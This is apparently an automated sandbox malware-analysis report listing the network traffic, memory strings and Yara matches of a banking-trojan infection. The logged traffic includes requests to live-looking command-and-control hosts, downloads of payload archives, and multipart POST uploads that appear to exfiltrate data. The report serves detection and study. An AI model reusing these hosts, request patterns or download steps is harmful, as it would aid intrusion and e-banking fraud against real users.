                      Source: global trafficHTTP traffic detected: POST /images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=315998012542640097891134987170User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atContent-Length: 387Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 34 43 32 2e 62 69 6e 22 0d 0a 0d 0a c4 3a 05 dc 08 18 e8 11 ed cf a4 0c ab c1 02 66 7d 8c 42 f8 e1 54 84 bf 45 eb 69 35 db 71 df 5a 7f 36 2e 39 a9 d4 bc 44 3f a5 2d 4f e4 77 6d 4d e9 fd cb 9f 34 d3 52 90 c7 ef 96 8b 3a 51 52 33 1e 4e d7 58 12 20 f0 a1 ba 72 e2 a4 65 f4 9c 4a ba eb 0d a4 54 4a 8d a0 e6 5c df 1a 39 1e 99 48 4e bf 06 66 06 d2 5a c9 d5 25 ba ab df 3a 46 79 a9 9f 83 41 05 5b 19 68 e6 69 3c fa 64 22 5f d7 f5 51 fa 1a 19 70 83 6d 10 60 e4 02 29 a5 fe f7 70 0e ed 73 f8 c2 02 d4 cc d9 86 fb 43 90 cd b5 d4 4d 65 6e f2 f6 86 52 19 54 55 bf bc d5 03 6f 02 d5 2c db 53 12 f0 55 f2 6b bf 87 b2 cc aa 53 11 20 16 69 ac 25 cc fe 66 c8 96 93 c4 85 7f df 36 8f ff e7 40 65 fe 99 ce cc 93 52 c1 0b 35 49 c7 bb e4 4a 3a 27 ce 10 6b ec c7 39 84 5a 65 f9 0d 0a 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 2d 2d 0d 0a Data Ascii: --315998012542640097891134987170Content-Disposition: form-data; name="upload_file"; filename="84C2.bin":f}BTEi5qZ6.9D?-OwmM4R:QR3NX 
reJTJ\9HNfZ%:FyA[hi<d"_Qpm`)psCMenRTUo,SUkS i%f6@eR5IJ:'k9Ze--315998012542640097891134987170--
                      Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                      Source: Joe Sandbox ViewASN Name: CJNET-ASCheiljedangCoIncKR CJNET-ASCheiljedangCoIncKR
                      Source: Joe Sandbox ViewIP Address: 116.121.62.237 116.121.62.237
                      Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000014.00000003.458378624.0000012326C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.osofts/Microt0
                      Source: RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://curlmyip.net
                      Source: RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cmg
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.ux
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobp/
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.micro/1
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000014.00000002.472249997.000001230E871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://twitter.com/spotify
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: RuntimeBroker.exe, 0000002D.00000002.779649889.000001FFC2120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknownDNS traffic detected: queries for: resolver1.opendns.com
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D1CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,2_2_036D1CA5
                      Source: global trafficHTTP traffic detected: GET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: RuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: n Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                      Source: unknownHTTP traffic detected: POST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=318247997342640097891112487322User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atContent-Length: 563Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
